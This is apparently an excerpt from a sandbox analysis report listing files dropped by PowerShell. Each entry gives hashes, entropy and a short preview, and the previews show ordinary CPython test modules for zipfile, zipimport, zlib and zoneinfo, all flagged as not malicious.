                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3209
                                                                                                                                                                                                              Entropy (8bit):4.58481065367164
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:StUunDufwSmILeULRYE8wPCs4Dd7WlBP8YEzA1eRAWeM:StUCKfnmpE8wqpDd7WlBkY6AwA+
                                                                                                                                                                                                              MD5:EA9AEC28D07255AE3A1295DF9F12B075
                                                                                                                                                                                                              SHA1:F6E1ECCE2D6CDB80CB75661FA554387E40365C5C
                                                                                                                                                                                                              SHA-256:3AE87271C885D386CC5F7D6187D1C14C906B925CE2AF61483FA971BD78124CC6
                                                                                                                                                                                                              SHA-512:2E9EDDF0E6EBBBFD7C8CCE5940E2E05B0D2A5F941F6318FF15ACBEA9AA6D6E409C067EEA0EB55AFB163A9170C1D8AF04B261555F7B02394D1FC28F39D2B5CEA0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import io..import itertools..import math..import re..import string..import unittest..import zipfile....from ._functools import compose..from ._itertools import consume....from ._support import import_or_skip......big_o = import_or_skip('big_o')..pytest = import_or_skip('pytest')......class TestComplexity(unittest.TestCase):.. @pytest.mark.flaky.. def test_implied_dirs_performance(self):.. best, others = big_o.big_o(.. compose(consume, zipfile.CompleteDirs._implied_dirs),.. lambda size: [.. '/'.join(string.ascii_lowercase + str(n)) for n in range(size).. ],.. max_n=1000,.. min_n=1,.. ).. assert best <= big_o.complexities.Linear.... def make_zip_path(self, depth=1, width=1) -> zipfile.Path:.. """.. Construct a Path with width files at every level of depth... """.. zf = zipfile.ZipFile(io.BytesIO(), mode='w').. pairs = itertools.product(self.make_deep_path
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):19854
                                                                                                                                                                                                              Entropy (8bit):4.638077922591941
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:SmWbCSZtpw/aYt7IrBDZOc4mdZNb2ARkbRzRRh9R9DRSCkDWrEasiHm5Y3R50YDU:SmWbZ3VdDWrcKW418EQ
                                                                                                                                                                                                              MD5:84F05D2F737A9304823A4D458E2AE83F
                                                                                                                                                                                                              SHA1:A3CA6020B2BE16EA1AFE81D9C2495D10E5F9CBC0
                                                                                                                                                                                                              SHA-256:E5E45B5B412FC169B5941988E666BF65D5A77A96EC8AB55D3D3C62A9911A0104
                                                                                                                                                                                                              SHA-512:14DFE097471687202427C12490CADA37504079C1AF6B6B28119006E050E0EDECA8EF575D2CC6A39629FE9CA10D2BF33A256CB2F25199B111F8A449DEA1BCD509
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import io..import itertools..import contextlib..import pathlib..import pickle..import sys..import unittest..import zipfile....from ._functools import compose..from ._itertools import Counter....from ._test_params import parameterize, Invoked....from test.support.os_helper import temp_dir......class jaraco:.. class itertools:.. Counter = Counter......def add_dirs(zf):.. """.. Given a writable zip file zf, inject directory entries for.. any directories implied by the presence of children... """.. for name in zipfile.CompleteDirs._implied_dirs(zf.namelist()):.. zf.writestr(name, b"").. return zf......def build_alpharep_fixture():.. """.. Create a zip file with this structure:.... ... ... a.txt.. ... b.. . ... c.txt.. . ... d.. . . ... e.txt.. . ... f.txt.. ... g.. . ... h.. . ... i.txt.. ... j.. ... k.bin..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):115
                                                                                                                                                                                                              Entropy (8bit):4.446566376084913
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:1LYBUWR6eZ425EMY3WD5ZCQVLTShJ/Ry:1L6pV+2a5YXVLOb/A
                                                                                                                                                                                                              MD5:724350389DF1B6ECC395D208F1020769
                                                                                                                                                                                                              SHA1:DA8357794383094A113D90FBC671080638468FAC
                                                                                                                                                                                                              SHA-256:1239E588970F95B8C43AAB287B2DB9D442C148250BAC220F8ADC7BEF21F4173A
                                                                                                                                                                                                              SHA-512:FCAB67E577051E2E580DDE8907DA78541BB72AF6CFC7DAB410973274A7B0DB1C0EF075D6BB01023E1745A516A68F8DB438C135674807AB9A03C9D390BA216D6C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from . import test_path......__name__ == '__main__' and test_path.build_alpharep_fixture().extractall('alpharep')..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):144728
                                                                                                                                                                                                              Entropy (8bit):4.753755036139217
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:xkm+pXw5Bb4wujg0lmGZjAmCOoTYJ5OkyImTY:xpBb4wujg0lmGZjAm/WGr
                                                                                                                                                                                                              MD5:9C07AED1F6189C598F6E812B5FD2E429
                                                                                                                                                                                                              SHA1:3592C29B0BC0F17ACD6505AEEF44114C5024DA3F
                                                                                                                                                                                                              SHA-256:FAD0515D33B39A67A54F3D845BDB3D94EF9403BC585BF71B87C85FB9AA89B1AD
                                                                                                                                                                                                              SHA-512:47F89E90C175871C868DE8BCBF88D6393928A923F70237ECD212F14D03CE7765FCD0A8D5D28504930ECA0020FF2A6B7B1B82CEF8FB639D4A1FB1D2076A8D79DA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import array..import contextlib..import importlib.util..import io..import itertools..import os..import pathlib..import posixpath..import struct..import subprocess..import sys..import time..import unittest..import unittest.mock as mock..import zipfile......from tempfile import TemporaryFile..from random import randint, random, randbytes....from test import archiver_tests..from test.support import script_helper..from test.support import (.. findfile, requires_zlib, requires_bz2, requires_lzma,.. captured_stdout, captured_stderr, requires_subprocess..)..from test.support.os_helper import (.. TESTFN, unlink, rmtree, temp_dir, temp_cwd, fd_count..)......TESTFN2 = TESTFN + "2"..TESTFNDIR = TESTFN + "d"..FIXEDTEST_SIZE = 1000..DATAFILES_DIR = 'zipfile_datafiles'....SMALL_TEST_DATA = [('_ziptest1', '1q2w3e4r5t'),.. ('ziptest2dir/_ziptest2', 'qawsedrftg'),.. ('ziptest2dir/ziptest3dir/_ziptest3', 'azsxdcfvgb'),.. ('ziptest2dir/ziptes
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):34623
                                                                                                                                                                                                              Entropy (8bit):4.810798147234586
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:k2WXrBhKiffOrfSZrflwzDq+5+7rk8LNGpcw:kJciffOCLYX
                                                                                                                                                                                                              MD5:E631E993CFCC64FE46399DEDC2BBDCFB
                                                                                                                                                                                                              SHA1:8DEBE64E75FC487535AE9EBE4B061D762D9B6970
                                                                                                                                                                                                              SHA-256:005C5DAFEF91F50AD931EA83DD12E70905FB951DED986A994063C0342CEE3038
                                                                                                                                                                                                              SHA-512:45633A55134045C0945212C648BA36F123C481F9BDFC46D15FE7804995F2DB69FE9D7A296FE46B4A2CEBCA0E5670D8523A27974B9C4F9971960D9D644B4C7E51
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import sys..import os..import marshal..import importlib..import importlib.util..import struct..import time..import unittest..import unittest.mock..import warnings....from test import support..from test.support import import_helper..from test.support import os_helper....from zipfile import ZipFile, ZipInfo, ZIP_STORED, ZIP_DEFLATED....import zipimport..import linecache..import doctest..import inspect..import io..from traceback import extract_tb, extract_stack, print_tb..try:.. import zlib..except ImportError:.. zlib = None....test_src = """\..def get_name():.. return __name__..def get_file():.. return __file__.."""..test_co = compile(test_src, "<???>", "exec")..raise_src = 'def do_raise(): raise TypeError\n'....def make_pyc(co, mtime, size):.. data = marshal.dumps(co).. pyc = (importlib.util.MAGIC_NUMBER +.. struct.pack("<iLL", 0,.. int(mtime) & 0xFFFF_FFFF, size & 0xFFFF_FFFF) + data).. return pyc....def module_path_to_dotted_name(path):..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):11065
                                                                                                                                                                                                              Entropy (8bit):4.237253370127232
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:NvBqLBVG1UwlByoef97p5/Kg3tATnWhq3UW0cIOKyeey:NvB8VsBtQzSY
                                                                                                                                                                                                              MD5:547FA2C4C503B09B334195FF0A7D2369
                                                                                                                                                                                                              SHA1:2818CB2363B51E9B1F5E4A0098E96E2ACB456E34
                                                                                                                                                                                                              SHA-256:8E825628898DC3A7AD454C4AF6FE7B1D13F229CEBF582AA698FA6C5F80CB1E8C
                                                                                                                                                                                                              SHA-512:D2514CB8E9AFAAA5E9A7C89B7AE9B8CA9B9CD40E2BB0397FE2261ABDDF067F9781AF59FC94EE544B7E3682D064BA375FCBD91CBF200B39D0097E01481EF127B4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# This test module covers support in various parts of the standard library..# for working with modules located inside zipfiles..# The tests are centralised in this fashion to make it easy to drop them..# if a platform doesn't support zipimport..import test.support..import os..import os.path..import sys..import textwrap..import zipfile..import zipimport..import doctest..import inspect..import linecache..import unittest..from test.support import os_helper..from test.support.script_helper import (spawn_python, kill_python, assert_python_ok,.. make_script, make_zip_script)....verbose = test.support.verbose....# Library modules covered by this test set..# pdb (Issue 4201)..# inspect (Issue 4223)..# doctest (Issue 4197)....# Other test modules with zipimport related tests..# test_zipimport (of course!)..# test_cmd_line_script (covers the zipimport support in runpy)....# Retrieve some helpers from other test cases..from test.test_doctest import (tes
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):43583
                                                                                                                                                                                                              Entropy (8bit):4.799290336699909
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:eFlkM4gof8fl04dYH9tjHSt8yZI9zMVVBz:kHofmlldYH9t5YVHz
                                                                                                                                                                                                              MD5:5D3D522091E6A02DA2135A9486B45575
                                                                                                                                                                                                              SHA1:A8CEDAAB1C5AB2736D48CA946756132FAB8F9E79
                                                                                                                                                                                                              SHA-256:D92C75C7534BDCCA4B29A1FD2A937B35FAD869FF46C647CC6C00F6E9BE403EAE
                                                                                                                                                                                                              SHA-512:1CF94A26805C8AA4DEFB18A961118E3E77C2723F0916088A035F85DDB567A9EC1903F4228B47E5158628DE86C9DD4D637A60DD9F0FC63FDA34D303A258B9F709
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import unittest..from test import support..from test.support import import_helper..import binascii..import copy..import os..import pickle..import random..import sys..from test.support import bigmemtest, _1G, _4G, skip_on_s390x......zlib = import_helper.import_module('zlib')....requires_Compress_copy = unittest.skipUnless(.. hasattr(zlib.compressobj(), "copy"),.. 'requires Compress.copy()')..requires_Decompress_copy = unittest.skipUnless(.. hasattr(zlib.decompressobj(), "copy"),.. 'requires Decompress.copy()')......def _zlib_runtime_version_tuple(zlib_version=zlib.ZLIB_RUNTIME_VERSION):.. # Register "1.2.3" as "1.2.3.0".. # or "1.2.0-linux","1.2.0.f","1.2.0.f-linux".. v = zlib_version.split('-', 1)[0].split('.').. if len(v) < 4:.. v.append('0').. elif not v[-1].isnumeric():.. v[-1] = '0'.. return tuple(map(int, v))......ZLIB_RUNTIME_VERSION_TUPLE = _zlib_runtime_version_tuple()......# bpo-46623: On s390x, when a hardware accele
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):69
                                                                                                                                                                                                              Entropy (8bit):3.969902899493558
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:1LRzRz0MLDKYBibaIFLRzRz0MLDK+/R1xiv:1LRzRAKPBTIFLRzRAKFM
                                                                                                                                                                                                              MD5:0932A2F3C2C67D95FA39C0CBD8FEBD97
                                                                                                                                                                                                              SHA1:974D2603C8AF77847BE945F1388E79EBD399E3A3
                                                                                                                                                                                                              SHA-256:02A23F3B32E870FDAC0E561B7F9D1A1330DD7D9D0173C34A0A161A41D423A6A3
                                                                                                                                                                                                              SHA-512:946D3C4C7228855ED1D061428C7B17E70C7C635603B68F2A685A84A6BA975B76ECAC2FCA8B9470F5590D2517D58B83A2B3C06A107E72A6CB8B3010214ECA8B4C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from .test_zoneinfo import *..from .test_zoneinfo_property import *..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):56
                                                                                                                                                                                                              Entropy (8bit):3.965438283935978
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:JShh9QLM3z6RNCmMmo0MLDK6n:CQLMSC0KX
                                                                                                                                                                                                              MD5:23B8DD1E1E2313F1E500AF1F74EC5FE3
                                                                                                                                                                                                              SHA1:5C80BDD38D160163D2A684A66FE5E0FCEF9F0F61
                                                                                                                                                                                                              SHA-256:B6943037914CE89195847B23F031C20AAEB1CF9BE5DF1C8C83F1F1448C146472
                                                                                                                                                                                                              SHA-512:95F78222A154A7E2E714788D055B260CE35445D54FDCA0D621461DE887FED889E40384112C897171083CD6D6B13C588A4D19FE0D9472B1F340ECE8AE6CDDFDD8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import unittest....unittest.main('test.test_zoneinfo')..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3300
                                                                                                                                                                                                              Entropy (8bit):4.591367001263984
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:UKzbr57wFK3qIvVpWK5gKPm0qjbgMUaoxsX5:UK7TqwVPm0IbgMdoxsX5
                                                                                                                                                                                                              MD5:268581CEF14658F6B02E9DD09719E1D9
                                                                                                                                                                                                              SHA1:D9BBA7CE46A27E92581BADA949F628B8A95706A9
                                                                                                                                                                                                              SHA-256:295F1037679095A721EC3F15BF4F01C3C2041798B0FD41A3391F8B6E76E56D0F
                                                                                                                                                                                                              SHA-512:955311640117D994D0B676F4DD5C235B0C3A42E0F3FC9F7947F00CE3D11CB2A6894BD9053878D40138DF0F28A1592272F0EDD2720EDD87AB2394D7EBF202D7C6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import contextlib..import functools..import sys..import threading..import unittest..from test.support.import_helper import import_fresh_module....OS_ENV_LOCK = threading.Lock()..TZPATH_LOCK = threading.Lock()..TZPATH_TEST_LOCK = threading.Lock()......def call_once(f):.. """Decorator that ensures a function is only ever called once.""".. lock = threading.Lock().. cached = functools.lru_cache(None)(f).... @functools.wraps(f).. def inner():.. with lock:.. return cached().... return inner......@call_once..def get_modules():.. """Retrieve two copies of zoneinfo: pure Python and C accelerated..... Because this function manipulates the import system in a way that might.. be fragile or do unexpected things if it is run many times, it uses a.. `call_once` decorator to ensure that this is only ever called exactly.. one time . in other words, when using this function you will only ever.. get one copy of each module rather than a fresh import
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3288
                                                                                                                                                                                                              Entropy (8bit):4.877443557458495
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:tc04VHH3vYKop0dKOhPD62vm6guPlZ0H0gYsTw:tcRfoHOhPDZrdzgVTw
                                                                                                                                                                                                              MD5:EAE20040CF397E3A961C5A0169CAFEE8
                                                                                                                                                                                                              SHA1:B3CF51AEA8C9447DCA10CAAD1314AF8BF7621869
                                                                                                                                                                                                              SHA-256:F8EC807F599342F8FB5FD3F3131AAE2B8FB855F6A30938620ED0506676EF363D
                                                                                                                                                                                                              SHA-512:F1740A77C6FE6893BF008CD34919EA281DE989D8A1320C5942DE628C900A8D73D50069B9341BC429284343F294AE60D79070A8838E124C89E436450EC75C2F6B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""..Script to automatically generate a JSON file containing time zone information.....This is done to allow "pinning" a small subset of the tzdata in the tests,..since we are testing properties of a file that may be subject to change. For..example, the behavior in the far future of any given zone is likely to change,..but "does this give the right answer for this file in 2040" is still an..important property to test.....This must be run from a computer with zoneinfo data installed..."""..from __future__ import annotations....import base64..import functools..import json..import lzma..import pathlib..import textwrap..import typing....import zoneinfo....KEYS = [.. "Africa/Abidjan",.. "Africa/Casablanca",.. "America/Los_Angeles",.. "America/Santiago",.. "Asia/Tokyo",.. "Australia/Sydney",.. "Europe/Dublin",.. "Europe/Lisbon",.. "Europe/London",.. "Pacific/Kiritimati",.. "UTC",..]....TEST_DATA_LOC = pathlib.Path(__file__).parent......@functools.lru_cache(ma
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):13084
                                                                                                                                                                                                              Entropy (8bit):6.342623602260241
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:QhfRaogOBmI7wtHBe5OLqqeoCqtM73QNCYCnXCkcRh41NIVM2njXAWxj3Fe/ESlP:ER2I0tHBVe5KM7QmXCIwVpLxjGEQzZhP
                                                                                                                                                                                                              MD5:CE5E9CE0B4DDBC11C3509AA2BD78860C
                                                                                                                                                                                                              SHA1:D89BEC99491C43745EA3EE09072840AA07EE0A00
                                                                                                                                                                                                              SHA-256:024A384A1B875063C07AAACFE2DFF63F0E163987193177BAB709966C2357035A
                                                                                                                                                                                                              SHA-512:41CEAF9527742649F55A9C3EBC755CD20C03EF8FB78886002A99DCE39E8D07D8069C984D2732573DBECD7B36D9DFB16A6F8EF4F4BCA9F4FCD3FF088A33D43969
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:{.. "data": {.. "Africa/Abidjan": [.. "{Wp48S^xk9=GL@E0stWa761SMbT8$j-~f{VGF<>F7KxBg5R*{Ksocg8-YYVul=v7vZzaHN",.. "uC=da5UI2rH18c!OnjV{y4u(+A!!VBKmY&$ORw>7UO^(500B;v0RR91bXh%WvBYQl0ssI2",.. "00dcD".. ],.. "Africa/Casablanca": [.. "{Wp48S^xk9=GL@E0stWa761SMbT8$j;0b&Kz+C_;7KxBg5R*{N&yjMUR~;C-fDaSOU;q-~",.. "FqW+4{YBjbcw}`a!dW>b)R2-0a+uwf`P3{_Y@HuCz}S$J$ZJ>R_V<~|Fk>sgX4=%0vUrh-",.. "lt@YP^Wrus;j?`Th#xRPzf<<~Hp4DH^gZX>d{+WOp~HNu8!{uWu}&XphAd{j1;rB4|9?R!",.. "pqruAFUMt8#*WcrVS{;kLlY(cJRV$w?d2car%R<ALOSO?^`4;ZZtI)%f^^G^>s>q9BgTU4",.. "Ht-tQKZ7Z`9QqOb?R#b%z?rk>!CkH7jy3wja4NG2q)H}fNRKg8v{);Em;K3Cncf4C6&Oaj",.. "V+DbX%o4+)CV3+e!Lm6dutu(0BQpH1T?W(~cQtKV*^_Pdx!LirjpTs?Bmt@vktjLq4;)O!",.. "rrly=c*rwTwMJFd0I57`hgkc?=nyI4RZf9W$6DCWugmf&)wk^tWH17owj=#PGH7Xv-?9$j",.. "njwDlkOE+BFNR9YXEmBpO;rqEw=e2IR-8^(W;8ma?M3JVd($2T>IW+0tk|Gm8>ftukRQ9J",.. "8k3brzqMnVyjsLI-CKneFa)Lxvp_a<CkQEd#(pMA^rr}rBNElGA=*!M)puBdoErR9{kWL@",.. "w=svMc6eZ^
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):82649
                                                                                                                                                                                                              Entropy (8bit):4.672848893212964
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:OJoc/u+m4ReCGkUCqCIUk7mvLp2c2M4K8lB:Oq4u+jReCdUCvkBM4K8X
                                                                                                                                                                                                              MD5:0227F4AB864FD93695B24A48B3E41C3F
                                                                                                                                                                                                              SHA1:A3B0B0CD8B35A07900B04BE031B0888321790D93
                                                                                                                                                                                                              SHA-256:327D0E17A6B5E7649DB592044A74628355385A1F1F8C8476F7832471A39A338A
                                                                                                                                                                                                              SHA-512:550B186F8C0CF94CB9DBCDC02D74513A544008118096F7DBED332665854FC2EB33272F8DD7DD94957D41D9352F14D67B255BCD1030AC11AE9F3CFBDB8FEB11D1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:from __future__ import annotations....import base64..import contextlib..import dataclasses..import importlib.metadata..import io..import json..import os..import pathlib..import pickle..import re..import shutil..import struct..import tempfile..import unittest..from datetime import date, datetime, time, timedelta, timezone..from functools import cached_property....from test.support import MISSING_C_DOCSTRINGS..from test.test_zoneinfo import _support as test_support..from test.test_zoneinfo._support import OS_ENV_LOCK, TZPATH_TEST_LOCK, ZoneInfoTestBase..from test.support.import_helper import import_module, CleanImport....lzma = import_module('lzma')..py_zoneinfo, c_zoneinfo = test_support.get_modules()....try:.. importlib.metadata.metadata("tzdata").. HAS_TZDATA_PKG = True..except importlib.metadata.PackageNotFoundError:.. HAS_TZDATA_PKG = False....ZONEINFO_DATA = None..ZONEINFO_DATA_V1 = None..TEMP_DIR = None..DATA_DIR = pathlib.Path(__file__).parent / "data"..ZONEINFO_JSON = D
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12395
                                                                                                                                                                                                              Entropy (8bit):4.860439979066916
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:AG80L9KHi7kPWl36oLEtqlqLkVJlT6bTSHVrrTS9RTRuuavwDHl:FXAi7k2KoRqLkfccu/l
                                                                                                                                                                                                              MD5:16C4E377D7E33DB0DAE4538EEE93DA66
                                                                                                                                                                                                              SHA1:D03A3B0C9747DDFBE7D47D530CCD9A7C4BE8C385
                                                                                                                                                                                                              SHA-256:A28C0B314D0230D29946AA924DD7299A686E147D1EB5EFC83AB83767962D7C53
                                                                                                                                                                                                              SHA-512:1AD4A09058BFCD0CF51D758D1952DEDC0684B1A7E290595E20DCB748EA625E86BDA480A2D48FF0D453BD2C85013D5FBE967DDD56E3911485071E4E1C1C88AA7B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import contextlib..import datetime..import os..import pickle..import unittest..import zoneinfo....from test.support.hypothesis_helper import hypothesis....import test.test_zoneinfo._support as test_support....ZoneInfoTestBase = test_support.ZoneInfoTestBase....py_zoneinfo, c_zoneinfo = test_support.get_modules()....UTC = datetime.timezone.utc..MIN_UTC = datetime.datetime.min.replace(tzinfo=UTC)..MAX_UTC = datetime.datetime.max.replace(tzinfo=UTC)..ZERO = datetime.timedelta(0)......def _valid_keys():.. """Get available time zones, including posix/ and right/ directories.""".. from importlib import resources.... available_zones = sorted(zoneinfo.available_timezones()).. TZPATH = zoneinfo.TZPATH.... def valid_key(key):.. for root in TZPATH:.. key_file = os.path.join(root, key).. if os.path.exists(key_file):.. return True.... components = key.split("/").. package_name = ".".join(["tzdata.zoneinfo"] + components[:-1]).
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):741
                                                                                                                                                                                                              Entropy (8bit):4.363884794057295
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:f/ckQG9ngJdALMxRpHRTEKpJRbFVuSIDsss9LUGXe5vhL:X3ngv0MxrLJVjss9+51
                                                                                                                                                                                                              MD5:E496C730296D9B57AF9648AD245D7F20
                                                                                                                                                                                                              SHA1:39C99E7922972DBC46984DF320E3D99AED0DAFF2
                                                                                                                                                                                                              SHA-256:CFF586174109F4901052BFFE80F102EFE1703A8E4AD9E082B8DA26A7F893CB79
                                                                                                                                                                                                              SHA-512:ECE0DB011FAFADCA0F69629A6B6384349BE039EACBCB5C85E1A1C7B56555262F9678D8EF42E1AF29D851F122A72C040AD8708B1BFD5C0AA83515C005A16233C7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# Helper script for test_tempfile.py. argv[2] is the number of a file..# descriptor which should _not_ be open. Check this by attempting to..# write to it -- if we succeed, something is wrong.....import sys..import os..from test.support import SuppressCrashReport....with SuppressCrashReport():.. verbose = (sys.argv[1] == 'v').. try:.. fd = int(sys.argv[2]).... try:.. os.write(fd, b"blat").. except OSError:.. # Success -- could not write to fd... sys.exit(0).. else:.. if verbose:.. sys.stderr.write("fd %d is open in child" % fd).. sys.exit(1).... except Exception:.. if verbose:.. raise.. sys.exit(1)..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3031
                                                                                                                                                                                                              Entropy (8bit):4.913347151056587
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:pgHz06l+vOFLZz1iLo+ndi2AZbpUjAuBQxOeJFzvLA7veLIhnNZuXhX5Gg:pRPvOFLZ0Bdi26bxJx7JhgCIhnNZuX9N
                                                                                                                                                                                                              MD5:56437BF2F7B280079F81C1FF1638CE46
                                                                                                                                                                                                              SHA1:B358663512988678F98BD8E819D0B2C38E9F4DE5
                                                                                                                                                                                                              SHA-256:2F15150A98A5584EDFCD6E52A491FF3097C84D502A90B6C3021889E31B2D5EBF
                                                                                                                                                                                                              SHA-512:5D70ADF0AC2B767D1F13A58CA6A5A1D0D85D7FF13C8EAD78E15273E2D4554692E16D1AAFCCA0B5794B0CE62B76821B7764E76D09749F0AF7B9B2592BCA00457B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# It's intended that this script be run by hand. It runs speed tests on..# hashlib functions; it does not test for correctness.....import sys..import time..import hashlib......def creatorFunc():.. raise RuntimeError("eek, creatorFunc not overridden")....def test_scaled_msg(scale, name):.. iterations = 106201//scale * 20.. longStr = b'Z'*scale.... localCF = creatorFunc.. start = time.perf_counter().. for f in range(iterations):.. x = localCF(longStr).digest().. end = time.perf_counter().... print(('%2.2f' % (end-start)), "seconds", iterations, "x", len(longStr), "bytes", name)....def test_create():.. start = time.perf_counter().. for f in range(20000):.. d = creatorFunc().. end = time.perf_counter().... print(('%2.2f' % (end-start)), "seconds", '[20000 creations]')....def test_zero():.. start = time.perf_counter().. for f in range(20000):.. x = creatorFunc().digest().. end = time.perf_counter().... print(('%2.2f' % (e
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):25
                                                                                                                                                                                                              Entropy (8bit):3.7794705707972507
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:SyIFGaMIQWFIt:SbFGaMtWFu
                                                                                                                                                                                                              MD5:22CC72E6552E2BD4D5168010EA1E7B94
                                                                                                                                                                                                              SHA1:1A18A98C86FAB7E3DCE5E408C0AC804B99B991E6
                                                                                                                                                                                                              SHA-256:B80833EF32924A90EEE9D18453D2238ACED60B083F0E8CC084FD3B0C986D23A2
                                                                                                                                                                                                              SHA-512:B233FAB56EDEF9DB78DCE7D5068057BDAC333CA1200EF220592F286F4BCFDB914D976848E3AB9E9AE287EB2D011B7C9788B56875D8954B397B491CE70EAD67FE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*- coding: uft-8 -*-..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
